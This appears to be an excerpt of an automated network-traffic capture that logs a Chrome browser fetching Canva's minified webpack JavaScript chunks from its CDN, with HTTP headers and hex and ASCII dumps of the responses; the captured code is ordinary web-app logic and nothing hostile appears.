                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49983
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "3bd2ea7d8bf4c20b72f4cee9429ca81d"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:29 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:22 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: mTGYbgF2CLzmp+gw2XCzWTsDO9/joqGsbmQjfz8QOgrlGMPeYzEKgF54vW5aw0/bSm8E3n3MVnU=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8TFT113DD0Q7S1
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 2PO1XmOg68yR.WuvT8wKTATIIYgLjcqZ
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 39 48 66 33 56 78 77 66 30 54 6b 34 37 64 6d 71 65 5a 55 48 67 6a 42 30 42 42 56 69 37 69 77 54 62 6f 33 51 67 32 32 66 31 52 48 6d 38 6d 4a 31 70 77 65 63 25 32 46 55 39 43 6f 64 51 39 56 4f 61 64 65 50 6f 6e 74 42 6c 25 32 42 4c 31 70 77 6b 78 57 4f 42 50 75 37 38 43 39 65 77 66 31 77 65 25 32 42 50 44 38 58 59 44 30 58 37 71 68 72 52 43 4a 6f 6b 25 32 42 73 41 6f 48 75 66 6b 6a 76 48 38 4d 54 54 55 38 33 52 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Hf3Vxwf0Tk47dmqeZUHgjB0BBVi7iwTbo3Qg22f1RHm8mJ1pwec%2FU9CodQ9VOadePontBl%2BL1pwkxWOBPu78C9ewf1we%2BPD8XYD0X7qhrRCJok%2BsAoHufkjvH8MTTU83RY%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1195INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 30 33 37 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 31 34 34 35 38 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6037],{/***/ 214458:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1369INData Raw: 76 61 72 20 54 3d 5f 5f 63 2e 54 3b 76 61 72 20 4d 3d 5f 5f 63 2e 4d 3b 76 61 72 20 4c 69 3d 5f 5f 63 2e 4c 69 3b 76 61 72 20 4f 41 3d 5f 5f 63 2e 4f 41 3b 76 61 72 20 50 3d 5f 5f 63 2e 50 3b 76 61 72 20 51 3d 5f 5f 63 2e 51 3b 76 61 72 20 44 3d 5f 5f 63 2e 44 3b 76 61 72 20 4c 3d 5f 5f 63 2e 4c 3b 76 61 72 20 79 7a 3d 5f 5f 63 2e 79 7a 3b 76 61 72 20 61 7a 3d 5f 5f 63 2e 61 7a 3b 76 61 72 20 63 7a 3d 5f 5f 63 2e 63 7a 3b 76 61 72 20 50 57 3d 5f 5f 63 2e 50 57 3b 76 61 72 20 6e 41 3d 5f 5f 63 2e 6e 41 3b 76 61 72 20 42 3d 5f 5f 63 2e 42 3b 76 61 72 20 76 64 3d 5f 5f 63 2e 76 64 3b 76 61 72 20 7a 64 3d 5f 5f 63 2e 7a 64 3b 76 61 72 20 56 69 3d 5f 5f 63 2e 56 69 3b 76 61 72 20 59 68 3d 5f 5f 63 2e 59 68 3b 76 61 72 20 6c 6a 3d 5f 5f 63 2e 6c 6a 3b 76 61 72
                                                                                                                                                                                                                                                                    Data Ascii: var T=__c.T;var M=__c.M;var Li=__c.Li;var OA=__c.OA;var P=__c.P;var Q=__c.Q;var D=__c.D;var L=__c.L;var yz=__c.yz;var az=__c.az;var cz=__c.cz;var PW=__c.PW;var nA=__c.nA;var B=__c.B;var vd=__c.vd;var zd=__c.zd;var Vi=__c.Vi;var Yh=__c.Yh;var lj=__c.lj;var
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1369INData Raw: 2e 74 72 61 63 6b 28 5f 5f 63 2e 68 42 62 2c 7b 55 62 3a 61 2e 48 2e 46 64 2e 56 64 2e 55 62 2c 6b 62 3a 61 2e 48 2e 46 64 2e 56 64 2e 6b 62 2c 6d 6f 64 65 3a 61 2e 48 2e 46 64 2e 56 64 2e 6d 6f 64 65 2c 47 35 3a 63 2c 77 42 3a 22 70 6c 61 79 65 72 22 2c 4a 77 3a 61 2e 48 2e 46 64 2e 56 64 2e 4a 77 2c 50 77 3a 62 2c 4f 42 3a 22 66 61 72 65 77 65 6c 6c 22 7d 29 7d 3b 0a 57 34 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 7b 4b 61 3a 62 2c 62 61 3a 63 7d 29 7b 76 61 72 20 64 3b 5f 5f 63 2e 53 62 62 28 61 29 3b 6e 75 6c 6c 3d 3d 3d 28 64 3d 61 2e 48 68 61 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 6f 76 28 28 29 3d 3e 7b 7d 29 3b 63 6f 6e 73 74 20 65 3d 5f 5f 63 2e 73 4d 28 7b 4b 61 3a 62 2c 62 61 3a 63 7d 29 2c 66 3d 61 2e 71 6e 2e 66 69
                                                                                                                                                                                                                                                                    Data Ascii: .track(__c.hBb,{Ub:a.H.Fd.Vd.Ub,kb:a.H.Fd.Vd.kb,mode:a.H.Fd.Vd.mode,G5:c,wB:"player",Jw:a.H.Fd.Vd.Jw,Pw:b,OB:"farewell"})};W4c=function(a,{Ka:b,ba:c}){var d;__c.Sbb(a);null===(d=a.Hha)||void 0===d?void 0:d.ov(()=>{});const e=__c.sM({Ka:b,ba:c}),f=a.qn.fi
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1369INData Raw: 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 6d 45 29 7c 7c 5f 5f 63 2e 76 72 61 29 7d 3b 0a 62 35 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 5f 63 2e 74 28 5f 5f 63 2e 24 51 61 2e 68 61 73 28 61 29 2c 60 49 6e 76 61 6c 69 64 20 76 69 65 77 65 72 20 72 65 61 63 74 69 6f 6e 20 63 6f 64 65 3a 20 24 7b 61 7d 60 29 3b 72 65 74 75 72 6e 20 61 7d 3b 58 34 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 7b 6c 69 6e 6b 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 7d 3b 72 65 74 75 72 6e 20 64 7a 28 5f 5f 63 2e 52 58 28 22 72 65 70 6f 72 74 2d 63 6f 6e 74 65 6e 74 22 2c 7b 61 70 70 3a 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 61 70 70 4e 61 6d 65 2c
                                                                                                                                                                                                                                                                    Data Ascii: ll===a||void 0===a?void 0:a.mE)||__c.vra)};b5c=function(a){__c.t(__c.$Qa.has(a),`Invalid viewer reaction code: ${a}`);return a};X4c=function(){var a={link:window.location.href};return dz(__c.RX("report-content",{app:null===a||void 0===a?void 0:a.appName,
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1369INData Raw: 7a 61 2c 5a 44 3a 67 2e 5a 44 2c 4e 31 3a 67 2e 4e 31 2c 46 4a 3a 67 2e 46 4a 2c 72 43 62 3a 68 2c 4b 39 61 3a 65 2c 78 6b 61 3a 31 45 33 2a 64 2c 72 45 3a 67 2e 72 45 2c 68 74 3a 6e 24 28 61 29 2c 4a 70 62 3a 6e 75 6c 6c 3d 3d 3d 66 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 3f 76 6f 69 64 20 30 3a 66 2e 6c 65 6e 67 74 68 2c 78 37 61 3a 66 7d 3b 61 2e 4e 66 3f 61 2e 4e 66 2e 4a 74 61 28 29 2e 74 68 65 6e 28 6e 3d 3e 7b 61 2e 4d 2e 74 72 61 63 6b 28 67 35 63 2c 7b 2e 2e 2e 6d 2c 56 4c 3a 6e 7d 29 7d 29 2e 63 61 74 63 68 28 28 29 3d 3e 7b 61 2e 4d 2e 74 72 61 63 6b 28 67 35 63 2c 6d 29 7d 29 3a 61 2e 4d 2e 74 72 61 63 6b 28 67 35 63 2c 6d 29 7d 7d 7d 3b 0a 6e 24 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6e 6e 65 63 74
                                                                                                                                                                                                                                                                    Data Ascii: za,ZD:g.ZD,N1:g.N1,FJ:g.FJ,rCb:h,K9a:e,xka:1E3*d,rE:g.rE,ht:n$(a),Jpb:null===f||void 0===f?void 0:f.length,x7a:f};a.Nf?a.Nf.Jta().then(n=>{a.M.track(g5c,{...m,VL:n})}).catch(()=>{a.M.track(g5c,m)}):a.M.track(g5c,m)}}};n$=function(a){a=a.navigator.connect
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1369INData Raw: 54 57 4f 52 4b 22 3b 63 61 73 65 20 4d 65 64 69 61 45 72 72 6f 72 2e 4d 45 44 49 41 5f 45 52 52 5f 44 45 43 4f 44 45 3a 72 65 74 75 72 6e 22 4d 45 44 49 41 5f 45 52 52 5f 44 45 43 4f 44 45 22 3b 63 61 73 65 20 4d 65 64 69 61 45 72 72 6f 72 2e 4d 45 44 49 41 5f 45 52 52 5f 53 52 43 5f 4e 4f 54 5f 53 55 50 50 4f 52 54 45 44 3a 72 65 74 75 72 6e 22 4d 45 44 49 41 5f 45 52 52 5f 53 52 43 5f 4e 4f 54 5f 53 55 50 50 4f 52 54 45 44 22 7d 7d 3b 6a 35 63 3d 66 75 6e 63 74 69 6f 6e 28 7b 75 73 65 72 41 67 65 6e 74 3a 61 2c 6d 61 78 54 6f 75 63 68 50 6f 69 6e 74 73 3a 62 7d 29 7b 72 65 74 75 72 6e 21 5f 5f 63 2e 6d 4d 62 28 61 29 7c 7c 2f 69 70 68 6f 6e 65 7c 69 70 61 64 2f 69 2e 74 65 73 74 28 61 29 3f 21 31 3a 31 3e 3d 62 7d 3b 0a 6b 35 63 3d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                    Data Ascii: TWORK";case MediaError.MEDIA_ERR_DECODE:return"MEDIA_ERR_DECODE";case MediaError.MEDIA_ERR_SRC_NOT_SUPPORTED:return"MEDIA_ERR_SRC_NOT_SUPPORTED"}};j5c=function({userAgent:a,maxTouchPoints:b}){return!__c.mMb(a)||/iphone|ipad/i.test(a)?!1:1>=b};k5c=functio
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1369INData Raw: 6e 28 68 2c 66 2e 79 29 2c 67 3d 4d 61 74 68 2e 6d 61 78 28 67 2c 66 2e 78 29 2c 6b 3d 4d 61 74 68 2e 6d 61 78 28 6b 2c 66 2e 79 29 3b 5f 5f 63 2e 74 28 67 2d 65 3c 3d 62 2e 77 69 64 74 68 2b 32 45 2d 31 30 2c 22 78 20 65 78 74 65 6e 74 20 69 73 20 77 69 64 65 72 20 74 68 61 6e 20 74 68 69 73 20 62 6f 78 3a 20 7b 7d 20 3e 20 7b 7d 22 2c 0a 67 2d 65 2c 62 2e 77 69 64 74 68 2b 32 45 2d 31 30 29 3b 5f 5f 63 2e 74 28 6b 2d 68 3c 3d 62 2e 68 65 69 67 68 74 2b 32 45 2d 31 30 2c 22 79 20 65 78 74 65 6e 74 20 69 73 20 74 61 6c 6c 65 72 20 74 68 61 6e 20 74 68 69 73 20 62 6f 78 3a 20 7b 7d 20 3e 20 7b 7d 22 2c 6b 2d 68 2c 62 2e 68 65 69 67 68 74 2b 32 45 2d 31 30 29 3b 61 3d 62 2e 74 72 61 6e 73 66 6f 72 6d 28 63 2e 74 68 65 6e 28 5f 5f 63 2e 64 41 2e 74 72 61 6e
                                                                                                                                                                                                                                                                    Data Ascii: n(h,f.y),g=Math.max(g,f.x),k=Math.max(k,f.y);__c.t(g-e<=b.width+2E-10,"x extent is wider than this box: {} > {}",g-e,b.width+2E-10);__c.t(k-h<=b.height+2E-10,"y extent is taller than this box: {} > {}",k-h,b.height+2E-10);a=b.transform(c.then(__c.dA.tran
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1369INData Raw: 73 50 34 51 22 29 7d 29 7d 29 5d 7d 29 7d 3b 0a 43 35 63 3d 66 75 6e 63 74 69 6f 6e 28 7b 51 64 3a 61 2c 45 69 62 3a 62 2c 51 53 3a 63 3d 21 31 7d 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 6b 29 7b 61 2e 74 72 61 63 6b 28 76 35 63 2c 7b 54 43 62 3a 31 30 30 2a 65 2e 7a 6f 6f 6d 2c 52 41 62 3a 6b 7d 29 7d 63 6f 6e 73 74 20 65 3d 6e 65 77 20 77 35 63 28 7b 51 53 3a 63 7d 29 2c 66 3d 5f 5f 63 2e 74 69 28 28 29 3d 3e 64 28 22 73 6c 69 64 65 72 22 29 2c 31 30 30 2c 7b 6c 65 61 64 69 6e 67 3a 21 31 7d 29 2c 67 3d 5f 5f 63 2e 74 69 28 28 6b 2c 6c 2c 6d 29 3d 3e 7b 64 28 6b 29 3b 6e 75 6c 6c 3d 3d 3d 6d 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 76 6f 69 64 20 30 3a 6d 28 6e 75 6c 6c 3d 3d 3d 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 67 65 74
                                                                                                                                                                                                                                                                    Data Ascii: sP4Q")})})]})};C5c=function({Qd:a,Eib:b,QS:c=!1}){function d(k){a.track(v5c,{TCb:100*e.zoom,RAb:k})}const e=new w5c({QS:c}),f=__c.ti(()=>d("slider"),100,{leading:!1}),g=__c.ti((k,l,m)=>{d(k);null===m||void 0===m?void 0:m(null===l||void 0===l?void 0:l.get
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1369INData Raw: 61 6e 28 6c 29 3b 63 6f 6e 73 74 20 70 3d 65 2e 6c 70 3b 6d 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 6e 2e 78 3d 3d 3d 70 2e 78 26 26 6e 2e 79 3d 3d 3d 70 2e 79 7c 7c 64 28 22 6b 65 79 62 6f 61 72 64 5f 61 72 72 6f 77 73 22 29 7d 5d 29 5d 2c 75 6d 61 3a 63 2c 67 70 3a 65 2c 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 24 28 28 29 3d 3e 62 28 29 2c 28 29 3d 3e 76 6f 69 64 20 65 2e 72 65 73 65 74 28 29 29 7d 7d 7d 3b 0a 44 35 63 3d 66 75 6e 63 74 69 6f 6e 28 7b 51 64 3a 61 2c 4d 61 3a 62 7d 29 7b 63 6f 6e 73 74 20 7b 6d 63 62 3a 63 2c 48 6d 62 3a 64 2c 75 6d 61 3a 65 2c 67 70 3a 66 2c 73 65 74 75 70 3a 67 7d 3d 43 35 63 28 7b 51 64 3a 61 2c 45 69 62 3a 28 29 3d 3e 62 2e 59 61 2c 51 53 3a 21 30 7d 29 3b 61 3d 63 28
                                                                                                                                                                                                                                                                    Data Ascii: an(l);const p=e.lp;m.preventDefault();n.x===p.x&&n.y===p.y||d("keyboard_arrows")}])],uma:c,gp:e,setup:function(){return v$(()=>b(),()=>void e.reset())}}};D5c=function({Qd:a,Ma:b}){const {mcb:c,Hmb:d,uma:e,gp:f,setup:g}=C5c({Qd:a,Eib:()=>b.Ya,QS:!0});a=c(


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    70192.168.2.1249794104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC760OUTGET /chunk-batch/40ceb5685514c3ac.js+29a6013e2c182f97.js+a191003715351325.js+005f43e2061f01f1.js+9107e36b81496080.js+e42c36f16cc6f532.js+dad3364637d681fb.strings.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:44 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 956250
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512b597742dd-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49983
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:30 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:16 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 61jPqH+S69ztxmv793ONM6JkJBMA4+VqEIcdDfD0jjf0t1olymYWTxoxezyw3AvAMWjGAz1jK7c=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8HM9QRTQC62QD3
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 8Ge9w96OJbPwlgKKmOWsIZ4zbDyrLs8_
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC368INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 76 55 47 4f 52 67 52 70 54 54 41 73 38 7a 59 43 6b 62 65 45 4d 66 6a 45 71 33 57 45 73 7a 52 61 33 50 78 39 69 50 68 68 70 4c 6f 44 4f 50 6b 32 4f 46 6b 63 44 65 59 25 32 42 4b 4d 33 75 50 75 78 4d 73 6f 42 6f 30 7a 25 32 42 33 71 5a 25 32 42 32 51 6d 52 48 31 4a 33 56 64 70 54 78 31 4f 6f 73 64 35 39 71 41 61 6f 25 32 42 44 38 76 72 47 30 75 48 66 25 32 46 59 43 4f 71 59 4e 45 49 36 25 32 42 44 6d 34 38 67 45 6a 73 47 30 77 32 54 62 4c 69 36 31 6e 5a 6e 70 55 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vUGORgRpTTAs8zYCkbeEMfjEq3WEszRa3Px9iPhhpLoDOPk2OFkcDeY%2BKM3uPuxMsoBo0z%2B3qZ%2B2QmRH1J3VdpTx1Oosd59qAao%2BD8vrG0uHf%2FYCOqYNEI6%2BDm48gEjsG0w2TbLi61nZnpU%3D"}],"group":"cf-nel
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1221INData Raw: 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 34 30 63 65 62 35 36 38 35 35 31 34 63 33 61 63 2e 6a 73 0a 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 30 38 30 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 39 31 33 37 32 38 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f
                                                                                                                                                                                                                                                                    Data Ascii: ;// __FILE_CONTENT_FOR__:40ceb5685514c3ac.js(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5080],{/***/ 913728:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 5f 63 2e 69 64 3b 76 61 72 20 4b 3d 5f 5f 63 2e 4b 3b 76 61 72 20 62 64 3d 5f 5f 63 2e 62 64 3b 76 61 72 20 68 64 3d 5f 5f 63 2e 68 64 3b 76 61 72 20 50 61 3d 5f 5f 63 2e 50 61 3b 76 61 72 20 5a 63 3d 5f 5f 63 2e 5a 63 3b 76 61 72 20 57 3d 5f 5f 63 2e 57 3b 76 61 72 20 66 43 3d 5f 5f 63 2e 66 43 3b 76 61 72 20 67 43 3d 5f 5f 63 2e 67 43 3b 76 61 72 20 6f 75 3d 5f 5f 63 2e 6f 75 3b 76 61 72 20 6c 56 3b 76 61 72 20 66 61 3d 5f 5f 63 2e 66 61 3b 76 61 72 20 51 3d 5f 5f 63 2e 51 3b 76 61 72 20 54 3d 5f 5f 63 2e 54 3b 76 61 72 20 44 3d 5f 5f 63 2e 44 3b 76 61 72 20 4c 3d 5f 5f 63 2e 4c 3b 76 61 72 20 4d 3d 5f 5f 63 2e 4d 3b 76 61 72 20 24 77 3d 5f 5f 63 2e 24 77 3b 76 61 72 20 53 74 3d 5f 5f 63 2e 53 74 3b 76 61 72 20 4b 7a 3d 5f 5f 63 2e 4b 7a 3b 76 61 72 20
                                                                                                                                                                                                                                                                    Data Ascii: _c.id;var K=__c.K;var bd=__c.bd;var hd=__c.hd;var Pa=__c.Pa;var Zc=__c.Zc;var W=__c.W;var fC=__c.fC;var gC=__c.gC;var ou=__c.ou;var lV;var fa=__c.fa;var Q=__c.Q;var T=__c.T;var D=__c.D;var L=__c.L;var M=__c.M;var $w=__c.$w;var St=__c.St;var Kz=__c.Kz;var
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 65 4e 3b 76 61 72 20 69 76 3d 5f 5f 63 2e 69 76 3b 76 61 72 20 78 42 3d 5f 5f 63 2e 78 42 3b 76 61 72 20 53 78 3d 5f 5f 63 2e 53 78 3b 76 61 72 20 4c 4d 3b 76 61 72 20 59 3b 76 61 72 20 44 4d 3b 76 61 72 20 79 6e 3d 5f 5f 63 2e 79 6e 3b 76 61 72 20 78 4d 3b 76 61 72 20 77 4d 3b 76 61 72 20 61 65 3d 5f 5f 63 2e 61 65 3b 76 61 72 20 6a 77 3d 5f 5f 63 2e 6a 77 3b 76 61 72 20 4f 3d 5f 5f 63 2e 4f 3b 76 61 72 20 58 3b 76 61 72 20 4a 46 3d 5f 5f 63 2e 4a 46 3b 76 61 72 20 46 61 3d 5f 5f 63 2e 46 61 3b 76 61 72 20 4c 4c 3b 76 61 72 20 53 68 3d 5f 5f 63 2e 53 68 3b 76 61 72 20 73 49 3d 5f 5f 63 2e 73 49 3b 76 61 72 20 6d 49 3d 5f 5f 63 2e 6d 49 3b 76 61 72 20 67 49 3d 5f 5f 63 2e 67 49 3b 76 61 72 20 4e 48 3d 5f 5f 63 2e 4e 48 3b 76 61 72 20 55 4a 3d 5f 5f 63 2e
                                                                                                                                                                                                                                                                    Data Ascii: eN;var iv=__c.iv;var xB=__c.xB;var Sx=__c.Sx;var LM;var Y;var DM;var yn=__c.yn;var xM;var wM;var ae=__c.ae;var jw=__c.jw;var O=__c.O;var X;var JF=__c.JF;var Fa=__c.Fa;var LL;var Sh=__c.Sh;var sI=__c.sI;var mI=__c.mI;var gI=__c.gI;var NH=__c.NH;var UJ=__c.
